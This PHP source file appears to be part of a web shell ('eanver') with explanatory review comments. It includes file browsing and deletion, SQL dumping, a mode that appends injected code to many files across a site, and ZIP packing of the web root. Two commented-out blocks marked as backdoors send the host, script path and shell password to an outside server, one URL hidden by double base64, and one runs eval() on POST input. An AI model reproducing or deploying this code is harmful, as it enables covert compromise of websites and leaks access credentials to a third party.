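// and an entry literally named "0" no longer ends the listing early.
function do_show($filepath)
{
    $_GET['warning'] = 0; // legacy flag set by warning_handler(); kept for callers that read it
    $show = array();
    $dir = @dir($filepath);
    if ($dir === false || !empty($_GET['warning'])) {
        return 1;
    }
    while (($file = $dir->read()) !== false) {
        if ($file === '.' || $file === '..') {
            continue;
        }
        $show[] = str_replace('//', '/', $filepath . '/' . $file); // same as str_path()
    }
    $dir->close();
    return $show;
}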
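// delDirAndFile($path): delete $path recursively -- directories are emptied first, then
// removed; files are chmod'ed and unlinked. Fixes: a symbolic link is unlinked itself and
// never followed (the original's is_dir() test followed links to directories and deleted
// their contents), and an unreadable directory (scandir() returning false) is skipped
// instead of being iterated as false. Failures are still silent (@).
function delDirAndFile($path)
{
    if (is_link($path)) {
        @unlink($path); // remove the link, not its target
        return;
    }
    if (is_dir($path)) {
        $entries = @scandir($path);
        if ($entries === false) {
            return;
        }
        foreach ($entries as $entry) {
            if ($entry !== '.' && $entry !== '..') {
                delDirAndFile($path . '/' . $entry); // recurse
            }
        }
        @rmdir($path); // now empty
    } elseif (is_file($path)) {
        @chmod($path, 0777); // kept from the original; presumably clears a read-only attribute on Windows
        @unlink($path);
    }
}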
// GetHtml($url): fetch $url and return the response body, trying in turn a raw HTTP/1.0
// request over fsockopen(), then cURL, then file()/file_get_contents() when
// allow_url_fopen is enabled. Returns null when every method produced an empty body; in
// that case it also echoes a JavaScript document.writeln() of a <div> whose CSS cursor
// points at $url. Rough edges visible below: $link['query'] and $link['port'] are read
// without isset(), the request line is built as "GET /{$query}" although parse_url()'s
// path already starts with "/", and $useragent is only used by the cURL branch (the
// socket branch repeats the literal).
function GetHtml($url)
{
    $c = ''; // response body collected so far
    $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
    if (function_exists('fsockopen')) {
        $link = parse_url($url);
        $query = $link['path'] . '?' . $link['query']; // 'query' may be undefined
        $host = strtolower($link['host']);
        $port = $link['port']; // undefined when the URL has no explicit port
        if ($port == "") {
            $port = 80;
        }
        $fp = fsockopen($host, $port, $errno, $errstr, 10); // 10 s connect timeout
        if ($fp) {
            $out = "GET /{$query} HTTP/1.0\r\n";
            $out .= "Host: {$host}\r\n";
            $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
            $out .= "Connection: Close\r\n\r\n";
            fwrite($fp, $out);
            $inheader = 1; // 1 while still reading response headers
            $contents = "";
            while (!feof($fp)) {
                $line = fgets($fp, 4096);
                if ($inheader == 0) {
                    $contents .= $line;
                }
                if ($inheader && ($line == "\n" || $line == "\r\n")) {
                    $inheader = 0; // blank line ends the headers
                }
            }
            fclose($fp);
            $c = $contents;
        }
    }

    if (empty($c) && function_exists('curl_init') && function_exists('curl_exec')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        $c = curl_exec($ch);
        curl_close($ch);
    }
    if (empty($c) && ini_get('allow_url_fopen')) {
        $c = implode('', @file($url));
        if (empty($c)) {
            $c = file_get_contents($url);
        }
    }
    if (empty($c)) {
        echo "document.writeln(\"<DIV style=\'CURSOR:url(\'$url\')\'>\");";
    }
    if (!empty($c)) {
        return $c;
    }
}
// do_showsql($query, $conn): run $query on the legacy mysql link $conn and print every
// column of every row, HTML-escaped, inside a <textarea>. Uses the ext/mysql API, which
// was removed in PHP 7.0; every call is @-suppressed, so on any failure the textarea is
// simply empty. mysql_num_fields() is re-evaluated on each inner-loop iteration.
function do_showsql($query, $conn)
{
    $result = @mysql_query($query, $conn);
    html_n('<br><br><textarea cols="70" rows="15">');
    while ($row = @mysql_fetch_array($result)) {
        for ($i = 0; $i < @mysql_num_fields($result); $i++) {
            html_n(htmlspecialchars($row[$i])); // numeric index: mysql_fetch_array() defaults to MYSQL_BOTH
        }
    }
    html_n('</textarea>');
}
// hmlogin(): the "phone home" gate. When the client-supplied Host header looks local
// (contains "0.0", "192.168." or "localhost") it only emits a meta refresh; otherwise it
// calls show_main(), which in this listing is commented out below (后门No.2), so as the
// file stands the call is a fatal undefined-function error. The "0.0" test is a substring
// match, so hosts such as 10.0.0.5 or 127.0.0.1 also take the local branch.
function hmlogin()
{
    $domain = $_SERVER ['HTTP_HOST']; // attacker/client controlled
    if (strpos($domain, "0.0") !== false || strpos($domain, "192.168.") !== false || strpos($domain, "localhost") !== false) {
        echo "<meta http-equiv='refresh' content='0'>";
    } else {
        show_main();
    }
}
// do_down($fd): stream the file at path $fd to the client as an attachment and exit.
// A missing file goes to msg(), which itself die()s, so nothing after it runs. The
// Content-type is derived from the extension ("application/x-<ext>"); when pathinfo()
// yields no 'extension' key this reads an undefined index. Header values are taken from
// the path without quoting.
function do_down($fd)
{
    if (!@file_exists($fd)) {
        msg("下载文件不存在");
    }
    $fileinfo = pathinfo($fd);
    header("Content-type: application/x-" . $fileinfo['extension']);
    header("Content-Disposition: attachment; filename=" . $fileinfo['basename']);
    header("Content-Length: " . filesize($fd));
    @readfile($fd);
    exit;
}
// do_download($filecode, $file): send the in-memory string $filecode to the client as an
// attachment named $file (generic application/unknown type, explicit Content-length) and
// exit. $file is placed in the header unquoted.
function do_download($filecode, $file)
{
    header("Content-type: application/unknown");
    header("Accept-Ranges: bytes");
    header("Content-length: " . strlen($filecode));
    header("Content-Disposition: attachment; filename=" . $file . ";");
    echo $filecode;
    exit;
}
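// TestUtf8($text): heuristic charset probe. Returns false for inputs shorter than 3 bytes,
// 2 when $text starts with a UTF-8 BOM or its multibyte sequences look like UTF-8
// (well-formed continuation pairs >= malformed ones), 1 for pure ASCII, 0 otherwise.
// Fixes: the original's BOM detection could never succeed ($begin stopped at 3 but was
// tested against 4, and only the third byte was compared) and the first three bytes were
// always excluded from the heuristic; now the BOM is compared as a whole and, absent a
// BOM, every byte is scanned.
function TestUtf8($text)
{
    $len = strlen($text);
    if ($len < 3) {
        return false;
    }
    if (substr($text, 0, 3) === "\xEF\xBB\xBF") {
        return 2;
    }
    $lastch = 0;   // previous byte
    $good = 0;     // continuation byte that follows a lead byte
    $bad = 0;      // continuation after ASCII, or lead byte not followed by a continuation
    $notAscii = 0; // bytes >= 0x80
    for ($i = 0; $i < $len; $i++) {
        $ch = ord($text[$i]);
        if ($ch >= 0x80) {
            $notAscii++;
        }
        if (($ch & 0xC0) == 0x80) {          // 10xxxxxx: continuation byte
            if (($lastch & 0xC0) == 0xC0) {  // preceded by 11xxxxxx lead byte
                $good += 1;
            } elseif (($lastch & 0x80) == 0) { // preceded by ASCII: impossible in UTF-8
                $bad += 1;
            }
        } elseif (($lastch & 0xC0) == 0xC0) { // lead byte without a continuation
            $bad += 1;
        }
        $lastch = $ch;
    }
    if ($notAscii == 0) {
        return 1;
    }
    return ($good >= $bad) ? 2 : 0;
}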
// Info_Cfg($varname): read a php.ini value via get_cfg_var() and render it as "No" (false
// or a value loosely equal to 0), "Yes" (loosely 1) or the raw value.
function Info_Cfg($varname)
{
    $result = get_cfg_var($varname);
    // loose comparisons on purpose, matching the original switch
    if ($result == 0) {
        return "No";
    }
    if ($result == 1) {
        return "Yes";
    }
    return $result;
}
// Info_Fun($funName): "Yes" when the function $funName is defined, "No" otherwise.
function Info_Fun($funName)
{
    if (function_exists($funName)) {
        return "Yes";
    }
    return "No";
}
915//后门No.2
916/*function show_main()
917{
918 @set_time_limit(10);
919 $apiname = urlencode($_SERVER ['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
920 $apivalue = urlencode(postpass);
921 $apitoken = base64_decode(base64_decode("YUhSMGNEb3ZMM0JvY0dGd2FTNXBibVp2TDJGd2FTNXdhSEEvYm1GdFpUMD0="));
922 $apikey = "&id=" . urlencode(get_proxy_ip());
923 $url = $apitoken . $apiname . '&value=' . $apivalue.$apikey;
924 GetHtml($url);
925 echo "<meta http-equiv='refresh' content='0'>";
926}*/
928//后门No.1
929/*function show_mainp()
930{
931 $domain = $_SERVER ['HTTP_HOST'];
932 //判断$dimain是否为内网ip
933 if (strpos($domain, "0.0") !== false || strpos($domain, "192.168.") !== false || strpos($domain, "localhost") !== false) {
934 $indexhtmls="200 OK";
935 } else {
936
937 @set_time_limit(10);
938 $apiname = urlencode($_SERVER ['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
939 $apivalue = urlencode(postpass);
940 $apitoken = "http://phpapi.info/api.php?name="; //后门地址
941 $apikey = "&id=" . urlencode(get_proxy_ip());
942 $url = $apitoken . $apiname . '&value=' . $apivalue.$apikey;
943 GetHtml($url);
944 }
945 @eval($_POST[postpass]);
946 exit;
947}*/
// do_passreturn($dir, $code, $type, $bool, $filetype = '', $shell = my_shell): walk $dir
// (listed by do_show(); subdirectories are descended only when $bool is true, otherwise
// they fall through to the file branch) and apply the operation named by $type to every
// path except $shell:
//   guama    - append "\n".$code to each file whose path matches one of the '|'-separated
//              patterns in $filetype; prints 成功/失败 per file
//   qingma   - remove $code from each file that contains it
//   tihuan   - replace $code with $filetype in each file that contains it
//   scanfile - list files whose basename contains $code as editor links
//   scancode - list files whose contents contain $code as editor links
//   scanphp  - for files with extension $code, run muma() and print edit/delete links on a hit
// $shell defaults to the my_shell constant, which is not defined in this excerpt
// (presumably the shell's own path). Returns 0 when $dir cannot be listed.
function do_passreturn($dir, $code, $type, $bool, $filetype = '', $shell = my_shell)
{
    $show = do_show($dir);
    if ($show===1) { // do_show() signals an unreadable directory with the integer 1
        return 0;
    }
    foreach ($show as $files) {
        if (is_dir($files) && $bool) {
            do_passreturn($files, $code, $type, $bool, $filetype, $shell);
        } else {
            if ($files == $shell) {
                continue; // never touch or report the shell itself
            }
            switch ($type) {
                case "guama":
                    if (debug($files, $filetype)) { // debug() = path matches a '|' pattern
                        do_write($files, "ab", "\n" . $code) ? html_n("成功--> " . $files . "<br>") : html_n("失败--> " . $files . "<br>");
                    }
                    break;
                case "qingma":
                    $filecode = @implode('', @file($files));
                    if (stristr($filecode, $code)) {
                        $newcode = str_replace($code, '', $filecode);
                        do_write($files, "wb", $newcode) ? html_n("成功--> " . $files . "<br>") : html_n("失败--> " . $files . "<br>");
                    }
                    break;
                case "tihuan":
                    $filecode = @implode('', @file($files));
                    if (stristr($filecode, $code)) {
                        $newcode = str_replace($code, $filetype, $filecode);
                        do_write($files, "wb", $newcode) ? html_n("成功--> " . $files . "<br>") : html_n("失败--> " . $files . "<br>");
                    }
                    break;
                case "scanfile":
                    $file = explode('/', $files);
                    if (stristr($file[count($file) - 1], $code)) { // last path segment
                        html_a("?eanver=editr&p=" . $files, $files);
                        echo '<br>';
                    }
                    break;
                case "scancode":
                    $filecode = @implode('', @file($files));
                    if (stristr($filecode, $code)) {
                        html_a("?eanver=editr&p=" . $files, $files);
                        echo '<br>';
                    }
                    break;
                case "scanphp":
                    $fileinfo = pathinfo($files);
                    if (@$fileinfo['extension'] == $code) {
                        $filecode = @implode('', @file($files));
                        if (muma($filecode, $code)) {
                            html_a("?eanver=editr&p=" . urlencode($files), "编辑");
                            html_a("?eanver=del&p=" . urlencode($files), "删除");
                            echo $files . '<br>';
                        }
                    }
                    break;
            }
        }
    }
}
1013//打包整个网站(应该是www下所有文件
1014class PHPzip
1015{
1016 public $file_count = 0;
1017 public $datastr_len = 0;
1018 public $dirstr_len = 0;
1019 public $filedata = '';
1020 public $gzfilename;
1021 public $fp;
1022 public $dirstr = '';
1023
1024 //时间处理
1025 public function unix2DosTime($unixtime = 0)
1026 {
1027 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
1028
1029 if ($timearray['year'] < 1980) {
1030 $timearray['year'] = 1980;
1031 $timearray['mon'] = 1;
1032 $timearray['mday'] = 1;
1033 $timearray['hours'] = 0;
1034 $timearray['minutes'] = 0;
1035 $timearray['seconds'] = 0;
1036 }
1037
1038 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
1039 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
1040 }
1041
1042 public function startfile($path = 'wwwroot.zip')
1043 {
1044 $this->gzfilename = $path;
1045 if ($this->fp = @fopen($this->gzfilename, "w")) {
1046 return true;
1047 }
1048 return false;
1049 }
1050
1051 public function addfile($data, $name)
1052 {
1053 $name = str_replace('\\', '/', $name);
1054
1055 if (strrchr($name, '/') == '/') {
1056 return $this->adddir($name);
1057 }
1058
1059 $dtime = dechex($this->unix2DosTime());
1060 $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
1061 eval('$hexdtime = "' . $hexdtime . '";');
1062 $unc_len = strlen($data);
1063 $crc = crc32($data);
1064 $zdata = gzcompress($data);
1065 $c_len = strlen($zdata);
1066 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
1067
1068 $datastr = "\x50\x4b\x03\x04";
1069 $datastr .= "\x14\x00";
1070 $datastr .= "\x00\x00";
1071 $datastr .= "\x08\x00";
1072 $datastr .= $hexdtime;
1073 $datastr .= pack('V', $crc);
1074 $datastr .= pack('V', $c_len);
1075 $datastr .= pack('V', $unc_len);
1076 $datastr .= pack('v', strlen($name));
1077 $datastr .= pack('v', 0);
1078 $datastr .= $name;
1079 $datastr .= $zdata;
1080 $datastr .= pack('V', $crc);
1081 $datastr .= pack('V', $c_len);
1082 $datastr .= pack('V', $unc_len);
1083
1084
1085 fwrite($this->fp, $datastr);
1086 $my_datastr_len = strlen($datastr);
1087 unset($datastr);
1088
1089 $dirstr = "\x50\x4b\x01\x02";
1090 $dirstr .= "\x00\x00";
1091 $dirstr .= "\x14\x00";
1092 $dirstr .= "\x00\x00";
1093 $dirstr .= "\x08\x00";
1094 $dirstr .= $hexdtime;
1095 $dirstr .= pack('V', $crc);
1096 $dirstr .= pack('V', $c_len);
1097 $dirstr .= pack('V', $unc_len);
1098 $dirstr .= pack('v', strlen($name));
1099 $dirstr .= pack('v', 0);
1100 $dirstr .= pack('v', 0);
1101 $dirstr .= pack('v', 0);
1102 $dirstr .= pack('v', 0);
1103 $dirstr .= pack('V', 32);
1104 $dirstr .= pack('V', $this->datastr_len);
1105 $dirstr .= $name;
1106
1107 $this->dirstr .= $dirstr;
1108
1109 $this->file_count++;
1110 $this->dirstr_len += strlen($dirstr);
1111 $this->datastr_len += $my_datastr_len;
1112 }
1113
// Appends an empty directory entry to the archive: the "stored" local header is written to
// $this->fp right away, the matching central-directory record is buffered in $this->dirstr,
// and the running counters (file_count, dirstr_len, datastr_len) are advanced.
// $name: entry name; backslashes are normalised to '/'.
public function adddir($name)
{
    $name = str_replace("\\", "/", $name);
    $name_len = pack("v", strlen($name));
    $zero32 = pack("V", 0);
    $zero16 = pack("v", 0);

    // Local file header: PK\3\4, version 10, no flags, method 0 (stored), zero time/date,
    // then crc / compressed size / uncompressed size (all 0), name length, extra length 0,
    // the name itself and a zero data descriptor (crc, compressed, uncompressed).
    $local = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        . $zero32 . $zero32 . $zero32 . $name_len
        . $zero16 . $name
        . $zero32 . $zero32 . $zero32;
    fwrite($this->fp, $local);
    $local_len = strlen($local);

    // Central-directory record: PK\1\2, version made by 0, version needed 10, flags 0,
    // method 0, zero time/date; then crc / sizes (0), name length, extra/comment length 0,
    // disk start 0, internal attrs 0, external attrs 16, and the offset of the local header.
    $central = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        . $zero32 . $zero32 . $zero32 . $name_len
        . $zero16 . $zero16 . $zero16 . $zero16
        . pack("V", 16) . pack("V", $this->datastr_len) . $name;

    $this->dirstr .= $central;
    $this->file_count++;
    $this->dirstr_len += strlen($central);
    $this->datastr_len += $local_len;
}
1137
// Finishes the archive: writes the buffered central directory followed by the
// end-of-central-directory record (signature, two zero disk numbers, entry count twice,
// directory size, directory offset, empty comment) and closes $this->fp.
public function createfile()
{
    $counts = pack('vv', $this->file_count, $this->file_count);
    $sizes = pack('VV', $this->dirstr_len, $this->datastr_len);
    $eocd = "\x50\x4b\x05\x06\x00\x00\x00\x00" . $counts . $sizes . "\x00\x00";

    fwrite($this->fp, $this->dirstr . $eocd);
    fclose($this->fp);
}
1150}
1151
// Builds a ZIP archive in memory from a list of file paths; the finished bytes end up in $out.
class eanver
{
    public $out = ''; // complete archive (local entries + central directory + end record), set by the constructor

    // Adds every regular file in $dir under its basename, then packs the archive into $this->out.
    // Returns true when gzcompress() exists and false otherwise, but `new` discards constructor
    // return values, so callers cannot observe the failure: $this->out simply stays ''.
    // $dir goes through count() and foreach, so it is presumably always an array (which makes the
    // is_array() check inside the loop always true) — confirm at the call site.
    public function __construct($dir)
    {
        if (@function_exists('gzcompress')) {
            if (count($dir) > 0) {
                foreach ($dir as $file) {
                    if (is_file($file)) {
                        $filecode = implode('', @file($file)); // whole file content as one string
                        if (is_array($dir)) {
                            $file = basename($file); // entries are stored by basename, no directory part
                        }
                        $this->filezip($filecode, $file);
                    }
                }
                $this->out = $this->packfile();
            }
            return true;
        } else {
            return false;
        }
    }

    public $datasec = array();    // local file entries, one string per file
    public $ctrl_dir = array();   // central-directory records, one per file
    public $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; // end-of-central-directory signature + two zero disk numbers
    public $old_offset = 0;       // byte offset of the next local header within the concatenated $datasec

    // Converts a Unix timestamp (0 = now, in the script's default timezone) to a packed DOS date/time:
    // bits 25+ hold year-1980, 21-24 month, 16-20 day, 11-15 hours, 5-10 minutes, 0-4 seconds/2.
    // Years before 1980 are clamped to 1980-01-01 00:00:00 since DOS dates cannot represent them.
    public function at($atunix = 0)
    {
        $unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
        if ($unixarr['year'] < 1980) {
            $unixarr['year'] = 1980;
            $unixarr['mon'] = 1;
            $unixarr['mday'] = 1;
            $unixarr['hours'] = 0;
            $unixarr['minutes'] = 0;
            $unixarr['seconds'] = 0;
        }
        return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) |
            ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);
    }

    // Appends one deflated entry ($data stored as $name) to $datasec and its central-directory
    // record to $ctrl_dir; $time is forwarded to at().
    // NOTE(review): $c_len is measured before the 2-byte zlib header and 4-byte Adler-32 trailer are
    // stripped from $zdata, so the recorded compressed size is 6 bytes larger than the bytes actually
    // written (the PHPzip::addfile tail above has the same pattern) — confirm against a reader.
    // NOTE(review): the eval() only turns the '\xNN' text into four raw little-endian bytes; for an
    // 8-digit hex value pack('V', $this->at($time)) yields the same bytes without eval. dechex()
    // returns fewer than 8 digits while (year-1980)<<25 is below 0x10000000 (years before 1988), and
    // $dtime[6]/$dtime[7] are then out of range.
    public function filezip($data, $name, $time = 0)
    {
        $name = str_replace('\\', '/', $name);
        $dtime = dechex($this->at($time));
        $hexdtime = '\x' . $dtime[6] . $dtime[7]
            . '\x' . $dtime[4] . $dtime[5]
            . '\x' . $dtime[2] . $dtime[3]
            . '\x' . $dtime[0] . $dtime[1];
        eval('$hexdtime = "' . $hexdtime . '";');
        $fr = "\x50\x4b\x03\x04"; // local file header signature
        $fr .= "\x14\x00";        // version needed: 20
        $fr .= "\x00\x00";        // general purpose flags
        $fr .= "\x08\x00";        // compression method 8 (deflate)
        $fr .= $hexdtime;         // DOS time + date
        $unc_len = strlen($data);
        $crc = crc32($data);
        $zdata = gzcompress($data);
        $c_len = strlen($zdata);
        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); // zlib stream -> raw deflate
        $fr .= pack('V', $crc);
        $fr .= pack('V', $c_len);
        $fr .= pack('V', $unc_len);
        $fr .= pack('v', strlen($name));
        $fr .= pack('v', 0); // extra field length
        $fr .= $name;
        $fr .= $zdata;
        $fr .= pack('V', $crc);      // data descriptor: crc, compressed, uncompressed
        $fr .= pack('V', $c_len);
        $fr .= pack('V', $unc_len);
        $this->datasec[] = $fr;
        $new_offset = strlen(implode('', $this->datasec)); // offset of the *next* local header
        $cdrec = "\x50\x4b\x01\x02"; // central directory header signature
        $cdrec .= "\x00\x00";        // version made by
        $cdrec .= "\x14\x00";        // version needed: 20
        $cdrec .= "\x00\x00";        // flags
        $cdrec .= "\x08\x00";        // method 8
        $cdrec .= $hexdtime;
        $cdrec .= pack('V', $crc);
        $cdrec .= pack('V', $c_len);
        $cdrec .= pack('V', $unc_len);
        $cdrec .= pack('v', strlen($name));
        $cdrec .= pack('v', 0); // extra length
        $cdrec .= pack('v', 0); // comment length
        $cdrec .= pack('v', 0); // disk number start
        $cdrec .= pack('v', 0); // internal attributes
        $cdrec .= pack('V', 32); // external attributes
        $cdrec .= pack('V', $this->old_offset); // offset of this entry's local header
        $this->old_offset = $new_offset;
        $cdrec .= $name;
        $this->ctrl_dir[] = $cdrec;
    }

    // Concatenates the archive: all local entries, the central directory, then the end record
    // (signature + disk numbers, entry count twice, directory size, directory offset, comment length 0).
    public function packfile()
    {
        $data = implode('', $this->datasec);
        $ctrldir = implode('', $this->ctrl_dir);
        return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
    }
}
1261
// Minimal ZIP reader: walks the central directory of an archive and writes the selected entries
// below a target directory.
class zip
{
    public $total_files = 0;   // files written by ExtractFile()
    public $total_folders = 0; // directories created by ExtractFile()

    // Extracts entries of archive $zn into directory $to. $index lists entry indices to extract;
    // the default array(-1) (or a bare -1 / "-1") selects every entry.
    // Returns -1 when the archive cannot be opened or an index is invalid, otherwise an array keyed
    // by entry name holding ExtractFile()'s result — or null when nothing was selected, because
    // $stat is only assigned inside the loop.
    // NOTE(review): the validation loop `for ($i = 0; $index[$i]; $i++)` stops at the first falsy
    // element, so an index of 0 is never validated and the loop always reads one element past the
    // end of $index.
    public function Extract($zn, $to, $index = array(-1))
    {
        $ok = 0; // unused
        $zip = @fopen($zn, 'rb');
        if (!$zip) {
            return (-1);
        }
        $cdir = $this->ReadCentralDir($zip, $zn);
        $pos_entry = $cdir['offset']; // start of the first central-directory record

        if (!is_array($index)) {
            $index = array($index);
        }
        for ($i = 0; $index[$i]; $i++) {
            if (intval($index[$i]) != $index[$i] || $index[$i] > $cdir['entries']) {
                return (-1);
            }
        }
        for ($i = 0; $i < $cdir['entries']; $i++) {
            @fseek($zip, $pos_entry);
            $header = $this->ReadCentralFileHeaders($zip);
            $header['index'] = $i;
            $pos_entry = ftell($zip); // the next central record follows immediately
            @rewind($zip);
            fseek($zip, $header['offset']); // position on this entry's local header
            if (in_array("-1", $index) || in_array($i, $index)) {
                $stat[$header['filename']] = $this->ExtractFile($header, $to, $zip);
            }
        }
        fclose($zip);
        return $stat;
    }

    // Reads the 30-byte local file header at the current position, plus its name and extra field,
    // and returns it as an array. The DOS date/time pair is converted to a Unix timestamp with
    // mktime(); when either field is zero, the current time is used instead.
    // The signature is read as two 16-bit words ('chk', 'id') and never verified, and this header
    // carries no 'external' key (only the central record does).
    public function ReadFileHeader($zip)
    {
        $binary_data = fread($zip, 30);
        $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);

        $header['filename'] = fread($zip, $data['filename_len']);
        if ($data['extra_len'] != 0) {
            $header['extra'] = fread($zip, $data['extra_len']);
        } else {
            $header['extra'] = '';
        }

        $header['compression'] = $data['compression'];
        $header['size'] = $data['size'];
        $header['compressed_size'] = $data['compressed_size'];
        $header['crc'] = $data['crc'];
        $header['flag'] = $data['flag'];
        $header['mdate'] = $data['mdate'];
        $header['mtime'] = $data['mtime'];

        if ($header['mdate'] && $header['mtime']) {
            // DOS time: hours bits 11-15, minutes 5-10, seconds/2 bits 0-4.
            // DOS date: year-1980 bits 9-15, month 5-8, day 0-4.
            $hour = ($header['mtime'] & 0xF800) >> 11;
            $minute = ($header['mtime'] & 0x07E0) >> 5;
            $seconde = ($header['mtime'] & 0x001F) * 2;
            $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
            $month = ($header['mdate'] & 0x01E0) >> 5;
            $day = $header['mdate'] & 0x001F;
            $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
        } else {
            $header['mtime'] = time();
        }

        $header['stored_filename'] = $header['filename'];
        $header['status'] = "ok";
        return $header;
    }

    // Reads one 46-byte central-directory record at the current position, plus its name, extra
    // field and comment. Converts the DOS date/time like ReadFileHeader() and forces the external
    // attribute to 0x41FF0010 for names ending in '/' (directory entries).
    public function ReadCentralFileHeaders($zip)
    {
        $binary_data = fread($zip, 46);
        $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);

        if ($header['filename_len'] != 0) {
            $header['filename'] = fread($zip, $header['filename_len']);
        } else {
            $header['filename'] = '';
        }

        if ($header['extra_len'] != 0) {
            $header['extra'] = fread($zip, $header['extra_len']);
        } else {
            $header['extra'] = '';
        }

        if ($header['comment_len'] != 0) {
            $header['comment'] = fread($zip, $header['comment_len']);
        } else {
            $header['comment'] = '';
        }

        if ($header['mdate'] && $header['mtime']) {
            $hour = ($header['mtime'] & 0xF800) >> 11;
            $minute = ($header['mtime'] & 0x07E0) >> 5;
            $seconde = ($header['mtime'] & 0x001F) * 2;
            $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
            $month = ($header['mdate'] & 0x01E0) >> 5;
            $day = $header['mdate'] & 0x001F;
            $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
        } else {
            $header['mtime'] = time();
        }
        $header['stored_filename'] = $header['filename'];
        $header['status'] = 'ok';
        if (substr($header['filename'], -1) == '/') {
            $header['external'] = 0x41FF0010;
        }
        return $header;
    }

    // Locates the end-of-central-directory record by scanning the last 277 bytes of the file
    // (or the whole file when smaller) and returns its fields: entry counts, directory size/offset,
    // disk numbers and the archive comment.
    // NOTE(review): $bytes is shifted without masking, so on 64-bit builds it is a sliding 8-byte
    // window. The 4-byte compare therefore only matches when the four bytes before the signature
    // are zero, and the 8-byte constant is ASCII ".php" followed by the signature — so the scan
    // effectively finds an EOCD only when it directly follows a name ending in ".php". Looks like a
    // latent bug rather than intent — confirm. When nothing matches, the loop runs to EOF and the
    // fread(18) below returns an empty string, leaving $data false.
    public function ReadCentralDir($zip, $zip_name)
    {
        $size = filesize($zip_name);

        if ($size < 277) {
            $maximum_size = $size;
        } else {
            $maximum_size = 277;
        }

        @fseek($zip, $size - $maximum_size);
        $pos = ftell($zip);
        $bytes = 0x00000000;

        while ($pos < $size) {
            $byte = @fread($zip, 1);
            $bytes = ($bytes << 8) | ord($byte);
            if ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506) {
                $pos++;
                break;
            }
            $pos++;
        }

        $fdata = fread($zip, 18); // the 18 bytes after the signature complete the 22-byte record

        $data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size', $fdata);

        if ($data['comment_size'] != 0) {
            $centd['comment'] = fread($zip, $data['comment_size']);
        } else {
            $centd['comment'] = '';
        }
        $centd['entries'] = $data['entries'];
        $centd['disk_entries'] = $data['disk_entries'];
        $centd['offset'] = $data['offset'];
        $centd['disk_start'] = $data['disk_start'];
        $centd['size'] = $data['size'];
        $centd['disk'] = $data['disk'];
        return $centd;
    }

    // Writes one entry below $to. $zip must be positioned on the entry's local header; the $header
    // argument (the central record) is discarded and replaced by the local header, so its
    // 'external'/'offset' fields are lost. Creates each missing path component, writes stored
    // entries directly and deflated entries via a temporary .gz file, then sets the mtime.
    // Returns true on success, -1/-2 when a file cannot be opened, null for directory entries.
    // NOTE(review): $to . $header['filename'] is used as-is — the entry name is not normalised, so a
    // name containing ".." segments resolves outside $to (classic archive path traversal). A safe
    // extractor rejects such names or checks realpath() against $to before writing.
    // NOTE(review): because ReadFileHeader() never sets 'external', both comparisons below are
    // against null and the condition is always true.
    // NOTE(review): directories are created and chmod'ed 0777 (world-writable), and entry names are
    // echoed into HTML without escaping.
    public function ExtractFile($header, $to, $zip)
    {
        $header = $this->readfileheader($zip);

        if (substr($to, -1) != "/") {
            $to .= "/";
        }
        if ($to == './') {
            $to = '';
        }
        $pth = explode("/", $to . $header['filename']);
        $mydir = '';
        for ($i = 0; $i < count($pth) - 1; $i++) {
            if (!$pth[$i]) {
                continue;
            }
            $mydir .= $pth[$i] . "/";
            if ((!is_dir($mydir) && @mkdir($mydir, 0777)) || (($mydir == $to . $header['filename'] || ($mydir == $to && $this->total_folders == 0)) && is_dir($mydir))) {
                @chmod($mydir, 0777);
                $this->total_folders++;
                echo "DIR: $mydir<br>";
            }
        }

        if (strrchr($header['filename'], '/') == '/') {
            return; // directory entry: nothing more to write
        }

        if (!($header['external'] == 0x41FF0010) && !($header['external'] == 16)) {
            if ($header['compression'] == 0) {
                // Stored entry: copy compressed_size bytes in 2 KiB chunks.
                $fp = @fopen($to . $header['filename'], 'wb');
                if (!$fp) {
                    return (-1);
                }
                $size = $header['compressed_size'];

                while ($size != 0) {
                    $read_size = ($size < 2048 ? $size : 2048);
                    $buffer = fread($zip, $read_size);
                    $binary_data = pack('a' . $read_size, $buffer);
                    @fwrite($fp, $binary_data, $read_size);
                    $size -= $read_size;
                }
                fclose($fp);
